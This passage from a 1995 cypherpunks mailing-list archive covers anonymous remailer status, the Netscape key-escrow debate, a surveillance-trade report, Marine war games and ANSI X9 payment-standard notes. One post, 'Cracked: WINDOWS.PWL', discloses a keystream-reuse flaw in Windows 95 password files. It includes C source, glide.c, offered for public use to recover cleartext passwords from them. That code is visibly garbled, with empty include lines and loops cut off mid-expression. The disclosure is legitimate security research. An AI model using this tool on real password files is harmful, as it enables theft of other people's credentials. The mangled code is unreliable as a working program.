is it compatible with PGP 2.3? Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From jya at pipeline.com Mon Dec 4 06:25:06 1995 From: jya at pipeline.com (John Young) Date: Mon, 4 Dec 95 06:25:06 PST Subject: GAK_hit Message-ID: <199512041425.JAA18561@pipe1.nyc.pipeline.com> 12-4-95. W$Jabber: "Microsoft Probe Spurs Subpoenas Tied to Internet. Antitrust Effort Appears Focused on Windows 95 Disabled Rival Software." The subpoenas indicate that Justice Department officials are focusing on whether Microsoft's Windows 95 and related Internet software improperly disable rival programs that let users access the Internet. Industry executives said the Justice Department has issued "civil investigative demands" to Netscape and CompuServe. The subpoena issued to Netscape may be of particular significance. In the estimate of Netscape and industry observers, roughly 80% of World Wide Web users, a population pegged at more than 17 million, use Netscape's software. Because of that presence, even if Netscape were alone in having its software disabled by Microsoft's new products, "I would say Netscape would have a cause of action and that the Justice Department would have a basis to investigate or bring an action," said Garret Rasmussen, an antitrust lawyer. GAK_hit (5 kb) From raph at CS.Berkeley.EDU Mon Dec 4 06:50:08 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 4 Dec 95 06:50:08 PST Subject: List of reliable remailers Message-ID: <199512041450.GAA06784@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub reord"; $remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord"; $remailer{"rahul"} = " cpunk pgp hash filter"; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?"; $remailer{"syrinx"} = " cpunk pgp hash cut reord mix post"; $remailer{"ford"} = " cpunk pgp hash ksub"; $remailer{"hroller"} = " cpunk pgp hash latent ek"; $remailer{"vishnu"} = " cpunk mix pgp. hash latent cut ek ksub reord"; $remailer{"robo"} = " cpunk hash mix"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord"; $remailer{"rmadillo"} = " mix cpunk pgp hash latent cut"; $remailer{"ecafe"} = " cpunk mix"; $remailer{"wmono"} = " cpunk mix pgp. hash latent cut ek"; $remailer{"shinobi"} = " cpunk mix hash latent cut ek reorder"; $remailer{"amnesia"} = " cpunk mix pgp hash latent cut ek ksub"; $remailer{"gondolin"} = " cpunk mix pgp hash latent cut ek reord"; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Groups of remailers sharing a machine or operator: (robo syrinx c2) (flame hacktic replay) (alumni portal) Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too. Last update: Mon 4 Dec 95 6:47:39 PST remailer email address history latency uptime ----------------------------------------------------------------------- hroller hroller at c2.org ---########* 7:37 99.98% hacktic remailer at utopia.hacktic.nl * *** ****** 7:13 99.59% rmadillo remailer at armadillo.com ++++++++++ 40:07 99.51% portal hfinney at shell.portal.com *##* #+*## 2:31 99.27% c2 remail at c2.org - +*****++- 48:01 99.14% extropia remail at extropia.wimsey.com ----.---. 7:39:43 98.95% vishnu mixmaster at vishnu.alias.net * *** *#** 5:22 98.88% spook remailer at valhalla.phoenix.net ** ..-** 3:29:17 98.79% flame remailer at flame.alias.net ****** *** 17:26 98.78% amnesia amnesia at chardos.connix.com *- --+- + 1:52:55 98.67% ecafe cpunk at remail.ecafe.org # ## ## ### 7:56 98.58% wmono wmono at valhalla.phoenix.net ** * * 12:35 98.13% shinobi remailer at shinobi.alias.net +*- + --+ 45:49 97.35% alumni hal at alumni.caltech.edu +* *#* 3:38 96.35% bsu-cs nowhere at bsu-cs.bsu.edu # ### ## # :17 95.83% ideath remailer at ideath.goldenbear.com .-. ...- - 17:35:13 95.65% replay remailer at replay.com ** * * 5:12 95.51% mix mixmaster at remail.obscura.com .--.---.- 9:59:28 94.15% rahul homer at rahul.net +* **** +* 7:33 99.00% penet anon at anon.penet.fi - -+ - - 10:45:41 82.20% gondolin mix at remail.gondolin.org - 2:06:09 81.59% ford remailer at bi-node.zerberus.de ++ .--- 14:40:50 79.58% robo robo at c2.org --*#### # 14:09 69.63% History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From JR at ROCK.CNB.UAM.ES Mon Dec 4 07:21:26 1995 From: JR at ROCK.CNB.UAM.ES (JR at ROCK.CNB.UAM.ES) Date: Mon, 4 Dec 95 07:21:26 PST Subject: Netscape gives in to key escrow Message-ID: <951204173237.20a03d03@ROCK.CNB.UAM.ES> Black Unicorn wrote >On Fri, 1 Dec 1995 JR at ns.cnb.uam.es wrote: > >> From: SMTP%"tcmay at got.net" 1-DEC-1995 12:26:55.99 > ... > >You need to think real hard about how likely foreign customers on a scale >as large as the U.S. government are going to be attracted to a product >that forfeits its keys to the U.S. government. Consider this problem >again in light of all the hand waving about the U.S. intelligence >agencies and industrial espionage/intelligence. I do, and I reckon most people, at this level now, worry more about how nice pages look than their security. Mostly because there is comparatively little interest yet. That's the whole issue: a company that is aware of that and wants to be the first at occupying the market will give security a second priority level -as most users do-. Look e.g. at any OS and how secure it is... I'm not defending Netscape, I argue about the reasons that drive the market and most companies -Netscape among them-. > >Let's put this example in a more personal context, with you as the >netscape guru. In fact, let us carry that assumption along, as really >I'm talking to the netscape insiders to begin with. Please, not that I have no liaison to Netscape. But I don't like all this broohaha about whether this or that guy is evil because s/he does/ doesn't hold with some principles/ends. If one wants to be effective, one needs to understand the other side's point of view, so as to be able to develop coherent strategies that work. Independently of what *my* personal convictions are -which I have never stated-, you can't forget that not everybody holds to your same ethics or needs to. ... > >Your faith in Joe Random vastly exceeds mine. So it seems. Anyway, that's the only resource we have. If Joe Random doesn't care, then it doesn't matter too much what you or me can say. Nor would it be correct that we imposed our view to the majority of Joes. ... >Your information cost is lower by a factor of 100 or more. Putting the >burden on our shoulders, and then couching it in terms of the cypherpunks >being negative, when indeed we are merely pointing out to whoever will >listen that a spineless money decision has been made, is the center of >hyprocracy. It sickens me. Again, I'm not Netscape. So, don't tell *me*. If it sickens you the position of anyone, I'm sorry. It may sicken me too, but I don't think that only will change how things are (sic). ... >As does this psycho-babble trash. It may be trash. But it works. Sorry if you don't like it, but that's how humans are. >So when pinto's explode, I might as well just advertize hondas as a >'better value' and not mention the rather glaring fault in the competing >product? Well, that -as I said- may depend on where you are. In some countries you could sue them, but you could not *say* they are bad. Odd, isn't it? But so it is. >I might add, few cypherpunks (to their great credit) sell their >software. We are interested in the software being the strongest, and >best quality. > So do I. And that's what I suggested: better alternatives. If there are some, then market forces will drive everything to our side. Just by making people angry we won't gain much. .. >You mean to realize that Netscape could care less about the 'educated' >consumer who is displeased with the decision, and instead is following >that large nose which sniffs the waifting scent of green? Exactly. If you realize that, you know what the problem is. If you assume any company has to be bounded by any cypherpunkish ideas, which in addition hurt their business, then you are not addressing the real problem. ... >Either support GAK or do not. Don't give us horseshit about how you >think we are being too hard on Netscape because we are educated >consumers, and because we realize that GAK crypto is not the best product it >could be. Sorry man, but as soon as Democracy comes in, elites go out the window. It's the domain of the common man. If the common man doesn't hold with the opinions of the educated man, then the educated man has nothing to do. >It is as much our right to gripe and moan about the spineless decision as >it is for you to make it. To tell us to ignore it is hypocritical in the >extreme. If your product is so superior, why the hell should you care >about a few cypherpunks moaning about this or that? Aren't we members of You can gripe or moan or do as you wish. So do I, and I chose to express my opinion that educating the common man is more effective. And once more: it's not my product. I have nothing to do with Netscape. All I want is energies derived into effective courses. >Take your emotional censorship elsewhere. And while your at it, try >making a superior product to please us, rather than some high-school >textbook psycho-babble about saying only nice things to the other >children in the sandbox. I fear it is you who's becoming emotional and censoring. I didn't tell anybody to take his/her opinions anywhere else. I'm only exposing what my opinion is on how cryptography should be promoted and what is the -in my humble opinion- best course of action. As for "children in the sandbox"... it also seems I have some more respect for those "Joe Random"s than you do. And even if they are so, I prefer to take them into adulthood rather than keeping crypto priesthood to myself and pontificing them what they should do relying on me. jr From banisar at epic.org Mon Dec 4 07:33:14 1995 From: banisar at epic.org (Dave Banisar) Date: Mon, 4 Dec 95 07:33:14 PST Subject: PRIVACY WATCHDOG OUTS BIG B Message-ID: MEDIA RELEASE Contact: Simon Davies, Privacy International Davies at privint.demon.co.uk PRIVACY WATCHDOG OUTS BIG BROTHER COMPANIES New report uncovers a massive international surveillance trade funded by the arms industry and led by the UK On Monday 4 December, Privacy International will publish Big Brother Incorporated, a 150 page report which investigates the global trade in repressive surveillance technologies. The report, to be published on several Web sites on the Internet, shows how technology companies in Europe and North America provide the surveillance infrastructure for the secret police and military authorities in such countries as China, Indonesia, Nigeria, Angola, Rwanda and Guatemala The reports primary concern is the flow of sophisticated computer-based technology from developed countries to developing countries - and particularly to non-democratic regimes. The report demonstrates how these companies have strengthened the lethal authority of the world's most dangerous regimes. The report lists the companies, their directors, products and exports. In each case, source material is meticulously cited. Privacy International is publishing the report in digital form in several sites on the Internet to ensure its accessability by interested parties anywhere in the world. Surveillance technologies are defined as technologies which can monitor, track and assess the movements, activities and communications of individuals. More than 80 British companies are involved, making the UK the world leader in this field. Other countries, in order of significance, are the United States, France, Israel, the Netherlands and Germany. _Big Brother Incorporated_ is the first investigation ever conducted into this trade. Privacy International intends to update the report from time to time using trade fair documents and leaked information from whistleblowers. The surveillance trade is almost indistinguishable from the arms trade. More than seventy per cent of companies manufacturing and exporting surveillance technology also export arms, chemical weapons, or military hardware. Surveillance is a crucial element for the maintenance of any non-democratic infrastructure, and is an important activity in the pursuit of intelligence and political control. Many countries in transition to democracy also rely heavily on surveillance to satisfy the demands of police and military. The technology described in the report makes possible mass surveillance of populations. In the past, regimes relied on targeted surveillance. Much of this technology is used to track the activities of dissidents, human rights activists, journalists, student leaders, minorities, trade union leaders, and political opponents. It is also useful for monitoring larger sectors of the population. With this technology, the financial transactions, communications activity and geographic movements of millions of people can be captured, analysed and transmitted cheaply and efficiently. Western surveillance technology is providing invaluable support to military and totalitarian authorities throughout the world. One British computer firm provided the technological infrastructure to establish the South African automated Passbook system, upon which much of the functioning of the Apartheid regime British surveillance cameras were used in Tianamen Square against the pro-democracy demonstrators. In the 1980s, an Israeli company developed and exported the technology for the computerised death list used by the Guatemalan police. Two British companies routinely provide the Chinese authorities with bugging equipment and telephone tapping devices. Privacy International was formed in 1990 as a non-government, non-profit organisation. It brings together privacy experts, human rights advocates and technology experts in more than 40 countries, and works toward the goal of promoting privacy issues worldwide. The organisation acts as an impartial watchdog on surveillance activities by governments and corporations. For further information or interview, contact Simon Davies in London at davies at privint.demon.co.uk. The address of the web site is http://www.privacy.org/pi/reports/big_bro/ _________________________________________________________________________ Subject: PRIVACY WATCHDOG OUTS BIG BROTHER... _________________________________________________________________________ David Banisar (Banisar at privacy.org) * 202-544-9240 (tel) Privacy International Washington Office * 202-547-5482 (fax) 666 Pennsylvania Ave, SE, Suite 301 * HTTP://www.privacy.org/pi/ Washington, DC 20003 ------------------ RFC822 Header Follows ------------------ Received: by epic.org with SMTP;3 Dec 1995 23:09:13 -0500 Received: from epic.org (washofc.epic.org [204.91.138.50]) by svcs1.digex.net (8.6.12/8.6.12) with SMTP id XAA27478; Sun, 3 Dec 1995 23:07:51 -0500 Message-ID: Date: 3 Dec 1995 23:07:03 -0500 From: "Dave Banisar" Subject: PRIVACY WATCHDOG OUTS BIG B To: "pi" X-Mailer: Mail*Link SMTP-QM 3.0.2 _________________________________________________________________________ Subject: PRIVACY WATCHDOG OUTS BIG BROTHER... _________________________________________________________________________ David Banisar (Banisar at privacy.org) * 202-544-9240 (tel) Privacy International Washington Office * 202-547-5482 (fax) 666 Pennsylvania Ave, SE, Suite 301 * HTTP://www.privacy.org/pi/ Washington, DC 20003 From nobody at REPLAY.COM Mon Dec 4 07:41:16 1995 From: nobody at REPLAY.COM (Anonymous) Date: Mon, 4 Dec 95 07:41:16 PST Subject: Do the Right Thing Message-ID: <199512041541.QAA26295@utopia.hacktic.nl> Responding to msg by anonymous-remailer at shell.portal.com () on Mon, 4 Dec 1:42 AM >That authority now sits in other hands. In silicon. > >I doubt the President wants a market meltdown as we >start to move towards an election year. Body bags and >a bad economic front are a bad mix and could swing the >whole election with the dual near unsurmountable >election obstacles. > >Hopefully, god-willing, we won't face any tragedies. ----- Financial Times, Dec 4, 1995 US Marine chiefs trade places to experience tranche warfare Officers are preparing to do virtual battle in the Nymex oil pits [and wargame FinCide] By Laurie Morse A dozen US Marine Corps generals and colonels will today march on to the New York Mercantile Exchange trading floor and start matching wits with commodity futures traders. The traders often describe their fraught existence in the trading rings as virtual warfare, and the US military appears to agree. Keen to find ways of training officers to cope with the demands of high-tech 21st-century warfare, a group of Marine Corps top brass will venture into the Nymex crude oil pit in the World Trade Center after the regular market has closed. Assisted by a group of handpicked veteran commodity traders, the marines will plunge into a simulated session of futures trading that will include several market reversals and a barrage of oil-linked "news". Mr Gary Lapayover, the Nymex trader co-ordinating the event, says the trading session will allow the officers and traders to become acquainted on friendly turf, and give the Marines a glimpse of the multiple tasks and the speed -- that breakneck trading entails. Today's simulated trading will be followed tomorrow by a war games session. About 15 traders will follow the generals to an old officers' club on Governor's Island, off Manhattan, and test their skills in a computerised game designed by Gama Corp. a Virginia-based company that specialises in computer-generated battle scenarios. Later, the traders will tell the officers and their aides what they think of the battle experience. What do the Marines hope to learn from the commodities pits? "Our vision of what warfare will be in the 21st century is very different from what we've faced in the 20th," says Colonel Tom Harkins, director of operations at the Marines' war-fighting laboratory in Quantico, Virginia. In future, the Marines expect to be drawn into smaller conflicts of the type seen in Somalia and Bosnia. At the same time, warfare will become increasingly digitalised, calling for rapid decision-taking amid a barrage of information. "How does a commander make decisions on a digital battlefield?" asks Col Harkins. "Technology will increase the tempo of battle, and the influx of digital information will require skills in what you might call pattern analysis. This is what futures traders do. In this exercise we want to see how people who face these conditions every day deal with the stress, and get comfortable with the risks." During tomorrow's war games, traders will be confronted by an on-screen battle area laid out on a grid, with as many as 50 small teams of cyber-soldiers seeking the "enemy". Once "contact" is made, the teams will request firepower. Under pressure, "commanders" must decide how to deploy resources to the best strategic advantage, while limiting losses. For Mr Eric Bolling, an independent trader who has survived nine years in the Nymex energy pits, the Marines are being shrewd in seeking to cross laser-swords with battle-hardened heroes of the trading pits. Mr Bolling, a 33-year-old former minor league baseball player, has no military background, but sees a lot of parallels between trading, sport and the armed services. All three require high levels of self-motivation and decision-making ability. Some of the generals and colonels may be shown to be more suited to high-stress, high-stakes environments than others, he says. "You have to be able to prioritise and analyse a lot of information rapidly -- then initiate risk by making a decision; and, finally, manage that risk by having the discipline to manage the trade," says Mr Bolling. "A lot of people can't do that, and wash out of these markets. I don't think it's something that can be learned really -- it's a personality type." Mr Lapayover said he selected floor veterans like Mr Bolling to participate because he was looking for "survivors" people who have been successful traders over a number of years. "Military experience wasn't a factor. The Marines are looking for people that can help them understand the process." Mr Lapayover has also suggested that the top brass visit the "war rooms" of America's largest investment banks to observe Wall Street's fixed income and equities traders, and the strategies of high-stakes corporate raiders. The war games are part of a new programme directed by General Charles Krulak, commandant of the Marine Corps. "War games are not designed to give you a total solution, they are designed to give you insight" he says. "We're going to have our laboratory analysts with us, and they will be looking at improving the process." ----- From jamesd at echeque.com Mon Dec 4 07:50:44 1995 From: jamesd at echeque.com (James A. Donald) Date: Mon, 4 Dec 95 07:50:44 PST Subject: Info on Netscape's key escrow position Message-ID: <199512041550.HAA16441@blob.best.net> >James A. Donald wrote: >> I would like to hear Jim Clark say "GAK is bad". At 11:05 PM 12/3/95 -0800, Jeff Weinstein wrote: > I do believe that the company, Netscape, will take such a position > in the coming week. I will be greatly relieved when this happens. I would be even more relieved if Netscape were to take action to make it more difficult for the government to introduce GAK. > Did he take a position against GAK? He did both less than that and considerably more than that: Instead of trying to persuade us that he was against GAK, he sought to persuade the reader that the reader should be against GAK. He sought to make it difficult for both a future Microsoft and a future government to introduce GAK. He described GAK in accurate language, rather than euphemistic terms. He did not editorialize "GAK is bad" but any reasonable person reading his book, unfamiliar with crypto and the controversy, would conclude from the facts that he presented that GAK is a radical violation of the fourth amendment -- He described GAK in neutral, factually accurate language that doubtless deeply offended the folks at NSA. > I've been trying to use either GAK, or "mandatory key escrow" > to refer to the hated beast. "Mandatory key escrow" is still an oxymoronic euphemism. It is not escrow if the valuable item is held by someone who is party to the potential conflict, or subject to the power of someone who is party to the potential conflict. Even to those of us who know what the euphemism "mandatory key escrow" stands for, it still does not sound nearly as threatening and scary as "government access to keys". --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Mon Dec 4 08:02:37 1995 From: jamesd at echeque.com (James A. Donald) Date: Mon, 4 Dec 95 08:02:37 PST Subject: GAK_hit Message-ID: <199512041603.IAA22793@blob.best.net> At 09:25 AM 12/4/95 -0500, John Young wrote: > 12-4-95. W$Jabber: > > "Microsoft Probe Spurs Subpoenas Tied to Internet. > Antitrust Effort Appears Focused on Windows 95 Disabled > Rival Software." > The subpoena issued to Netscape may be of particular > significance. In the estimate of Netscape and industry > observers, I regularly use netscape on windows 95, and I conclude that this subpoena is pure, 100% harassment. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From cme at TIS.COM Mon Dec 4 08:10:13 1995 From: cme at TIS.COM (Carl Ellison) Date: Mon, 4 Dec 95 08:10:13 PST Subject: [farber@central.cis.upenn.edu: IP: NSC Announce -- iPower home page/CryptoSampler announcement] Message-ID: <9512041608.AA26504@tis.com> >From a National Semiconductor press release... To order the CryptoSampler package in either configuration, call 1-800-272-9959 Ext# 631 between the hours of 7 AM and 7 PM Central Standard Time. To play CryptoSolver and for more information about the CryptoSampler program, see the iPower web site at http://www.ipsecure.com . From frank at funcom.no Mon Dec 4 08:52:01 1995 From: frank at funcom.no (Frank Andrew Stevenson) Date: Mon, 4 Dec 95 08:52:01 PST Subject: Cracked: WINDOWS.PWL Message-ID: A few days ago Peter Gutmann posted a description on how Windows 95 produces RC4 keys of 32 bits size to protect the .pwl files. I verified the information and wrote a program to decrypt .pwl files with a known password, I then discovered that the .pwl files where well suited for a known plaintext attack as the 20 first bytes are completely predictable. The 20 first bytes of any .pwl files contains the username, which is the same as the filename, in capitals, padded with 0x00. From then I wrote a program to bruteforce the .pwl file and optimized it so it would run in less than 24 hours on an SGI. I run a test of the bruter software and recovered an unknown rc4 key in 8 hours, but the decrypted file was still largely uninteligeble, I then proceeded to decrypt the file at all possible starting points, and discovered valuable information (cleartext passwords) offset in the file. This has enormous implications: RC4 is a stream cipher, it generates a long pseudo random stream that it uses to XOR the data byte by byte. This isn't neccecaraly weak encryption if you don't use the same stream twice: however WIN95 does, every resource is XORed with the same pseudo random stream. What's more the 20 first bytes are easy to guess. This is easy to exploit: XOR the 20 bytes starting at position 0x208 with the user name in uppercase, and slide this string through the rest of the file (xoring it with whatever is there) this reveals the 20 first bytes of the different resources. >From there I went on to study the structure of the .pwl file it is something like this (decrypted): USERNAME.........wpwpwpwpwpwpwpwpwpwp rs??????? rs rs rs??????????? rs??????? where wp is i word pointer to the different resources (from start of pwl file) The 2 first bytes of the resource (rs) is its length in bytes (of course XOR with RC4 output) It is the fairly easy to find all the resource pointers by jumping from start of resource to next resource, had it not been for the fact that the size sometimes is incorrect (courtesy of M$) What follows is a short c program that tries to remedy this and reconstruct the pointertable thus generating at least 54 bytes of the RC4 pseudorandom stream, and then proceedes to decrypt as much as possible from the different resources. What does this show? Although RC4 is a fairly strong cipher, it has the same limitations as any XOR streamcipher, and implementing it without sufficient knowledge can have dire consequences. I strongly suggest that the programmers at Microsoft do their homework before trying anything like this again! DISCLAIMER: This is a quick hack, I don't make any claims about usefulness for any purpose, nor do I take responsibility for use nor consequences of use of the software. FUNCOM of Norway is not responsible for any of this, (I speak for myself, and let others speak for themselves) This source is hereby placed in the public domain, please improve if you can. --- glide.c --- #include #include unsigned char Data[100001]; unsigned char keystream[1001]; int Rpoint[300]; main (int argc,char *argv[]) { FILE *fd; int i,j,k; int size; char ch; char *name; int cracked; int sizemask; int maxr; int rsz; int pos; int Rall[300]; /* resource allocation table */ if (argc<2) { printf("usage: glide filename (username)"); exit(1); } /* read PWL file */ fd=fopen(argv[1],"rb"); if(fd==NULL) { printf("can't open file %s",argv[2]); exit(1); } size=0; while(!feof(fd)) { Data[size++]=fgetc(fd); } size--; fclose(fd); /* find username */ name=argv[1]; if(argc>2) name=argv[2]; printf("Username: %s\n",name); /* copy encrypted text into keystream */ cracked=size-0x0208; if(cracked<0) cracked=0; if(cracked>1000) cracked=1000; memcpy(keystream,Data+0x208,cracked ); /* generate 20 bytes of keystream */ for(i=0;i<20;i++) { ch=toupper(name[i]); if(ch==0) break; if(ch=='.') break; keystream[i]^=ch; }; cracked=20; /* find allocated resources */ sizemask=keystream[0]+(keystream[1]<<8); printf("Sizemask: %04X\n",sizemask); for(i=0;i<256;i++) Rall[i]=0; maxr=0; for(i=0x108;i<0x208;i++) { if(Data[i]!=0xff) { Rall[Data[i]]++; if (Data[i]>maxr) maxr=Data[i]; } } maxr=(((maxr/16)+1)*16); /* resource pointer table size appears to be divisible by 16 */ /* search after resources */ Rpoint[0]=0x0208+2*maxr+20+2; /* first resource */ for(i=0;i> 8) & 0x00ff; } cracked+=maxr*2+2; printf("%d bytes of keystream recovered\n",cracked); /* decrypt resources */ for(i=0;i < maxr;i++) { rsz=Rpoint[i+1]-Rpoint[i]; if (rsz>cracked) rsz=cracked; printf("Resource[%d] (%d)\n",i,rsz); for(j=0;j E3D2BCADBEF8C82F A5891D2B6730EA1B PGPencrypted mail preferred, finger for key From perry at piermont.com Mon Dec 4 09:05:20 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 4 Dec 95 09:05:20 PST Subject: No Privacy Right in the Americas ? In-Reply-To: Message-ID: <199512041705.MAA07611@jekyll.piermont.com> "James M. Cobb" writes: > Friend, > Enemy, Please stop this neverending stream of oddly formatted and irrelevant messages... .pm From rsalz at osf.org Mon Dec 4 09:07:51 1995 From: rsalz at osf.org (Rich Salz) Date: Mon, 4 Dec 95 09:07:51 PST Subject: Meeting notes from ANSI X.9 Meeting on Electronic Payment Standard Message-ID: <9512041705.AA25255@sulphur.osf.org> ---------- Begin Forwarded Message ---------- Date: Fri, 1 Dec 1995 22:43:46 -0500 (EST) From: "Debbie O'Dell" To: Electronic Commerce Working Group Reflector Subject: Meeting notes from ANSI X.9 Meeting on Electronic Payment Standard ABA Meeting of the X.9 ANSI Meeting 11/29/95, on Electronic Payments: Cindy Katzen (?) gave an introduction. She said that the ANSI X.9 which is accredited to develop financial industry standards, has approved this work item on Electronic Payments. X.9 has 6 subcommittees, 30 active working groups, and manage 70 standards, and technical specifications. We do 5 year reviews on each. Also they are the US technical advisory group to ISO Technical Committee 68 (TC68), and they also provide a secretariat. TC68 has 3 subcommittees. Mark Zalewski of Cybercash is nominated chair for TC68. This is domestic standards development. Define work and tell them what needs to be done. If there does not need to be a domestic standard but an international one that is okay. Intel has offered to provide a Chairperson, Tom Jones. Tom lead the meeting with the following agenda: Scope of work item Proposal to extend the work item into other areas 2 presentations on other standards, Taher Elgamal on SEPP, and FSTC on Echeck The general purpose of this work item is to produce an American national standard on secure electronic payment syntax. Since the group is large, Tom suggested nominating a small editing group of 6-10 people to put together a document and bring it back to the larger group. Tom said that he wanted to get through the work item in 18 months, and to do that there would have to be a draft in 9 months. The following document was a strawman distributed to start discussion on a proposed X9 new work item. "Towards an American National Standard: Secure Payment Syntax Scope: The payment syntax described in this standard is designed to order a Financial Institution to make a payment to a merchant from an account of a purchaser based on the near term delivery of low monetary value goods or services. It should be possible to include this payment order in any electronic protocol that is based on communications between the purchaser and the merchant, and between the merchant and a Financial Institution. This standard does not describe, nor recommend, any particular communication protocol. When used within a complete payment infrastructure, the secure payment order described below shall offer privacy and integrity of the purchaser's payment information, and shall prevent the purchaser from successfully repudiating the sending, or the merchant from successfully repudiating the receiving, of a valid payment order. Non-repudiation of receipt will require secure acknowledgment messages. Thus the Financial Institution can be sure that its customer requested the payment and that the merchant can be accurately identified on the account statement. Purpose: Consumers, operating from within their own home or business, have access to an increasingly wide range of electronic displays of merchant's wares. The source of this electronic cornucopia can be provided by networked connections, broadcast or narrowcast TV, the physical distribution of electronic media, such as CD-ROM, or future media connections which are now only in the conceptual stage. Regardless of the source of the information, there is an increasingly urgent demand that user's make the purchase decision directly from the electronic media, and the purchase decision be transmitted together with payment information to the merchant. The merchant wants to receive the payment information prior to delivering the merchandise to cut down on fraud loss and the purchaser seems to want immediate access to the goods or services, purchased. This standard is intended to close the electronic loop by providing a secure means for the purchaser to make payment information available to the merchant, without revealing any secret information that could be used in a fraudulent manner to access the purchaser's accounts. The payment information will only be accessible by the purchaser, and the purchaser's Financial Institution, but the merchant can be assured, in real-time, that payment will be honored by his Financial Institution. Content of the Payment Order: The fields required for the payment order are separated into the plain text segment and enciphered segment. Transparent fields from CyberCash Credit Card Protocol (CH1) type: card-payment id order-id merchant-ccid transaction date pr-hash pr-signed-has cyberkey EPO fields from "NetBill Security and Transaction Protocol" purchaser's ID Product ID Negotiated Price Merchant ID Crypto Checksum of Product Request Data Crypto Checksum of Purchaser's Account No with a nonce Globally-unique EPOID (Transaction ID) Security for the Payment Order (from the Purchaser) Only those fields that are in the enciphered segment will be protected from disclosure or alteration by cryptographic means. Opaque fields from CyberCash Credit Card Protocol (CH1) swversion amount¤cy card (expiry, number, type, salt) - must be pre-approved signature EPO fields from "NetBill Security and Transaction Protocol" Ticket proving the customer's TRUE ID Authorization Tokens Purchaser's Account No nonce Purchaser's memo field Security for Merchant Fields Those fields that are in the merchant's enciphered segment will be protected from disclosure or alteration by cryptographic means. Merchant Opaque fields from CyberCash Credit Card Protocol (CM1/2) type order-id merchant-amount¤cy pr-hash pr-signed-hash id transaction date merchant-signature EPO fields from "NetBill Security and Transaction Protocol" added by merchant Merchant's account number Merchant's memo field Goods decryption key Merchant signature " Discussion on scope: The result of this group will be a message set and sequence diagram. There will be a lot of work going into what is in those messages. There was some discussion about the use of the terms low monetary value and merchant. Graham asked if other payment flows would be considered. Tom said that he wanted to have a scope that is small and easily achievable, so that is why we are focusing the flow from consumer to merchant to financial institution. Right now this cannot support cash, as it requires the consumer to have a bank account. It can support credit or debit. There are a relatively small group of encryption algorithms about to be approved by X-9. Three have been approved: DES, Triple DES is in the works, RSA and Vhelman (?). Digital Signature and Secure Hash is a standard; attribute lists are being worked on. Security folks in X9f will be active in this work item. It may be necessary to specify encryption schemes. Key exchange is quite different. If you allow more than one, you get into interoperability problems. NSA representative said that the length of the encryption key should not be an issue, but what is encrypted should be of more concern for the group. The group should not limit this standard based on a regulation that could change in a few months. The 820 is complicated and could be used to accomplish this activity, but this work item is trying to come up with a relatively simple consumer oriented transaction. If you are going to say privacy, integrity and non-repudiation, then you will have to define cryptography. X.9 has standards that define the cryptography protocols so we can reference them. The comments on the scope will be incorporated and a new draft will be submitted to the group for review. Will the usage specification operate with current regulation and clearing and settlement system? If you use Party A, Party B and a Bank, instead of using the term merchant, then you could move it in any way. If there are 2 parties and only one bank, then this will not effect any clearing system. If it is 2 parties and 2 banks then the clearing system comes into play. Should the second bank be added to the scope? Do we want to support flows between financial institutions. We need to rely on the banks to tell us if this is implementable. Dan suggested that the standard be expanded to support information exchanged between banks. Tom said that we should work to understood the needs of customers and limit ourselves to the problems that we know and not try and solve problems we don't know about. We can produce guidelines for reference implementations, but they are not part of the standard. We encourage organizations that are developing implementations to advise us of any issues in implementing the standard. Tom said that he will 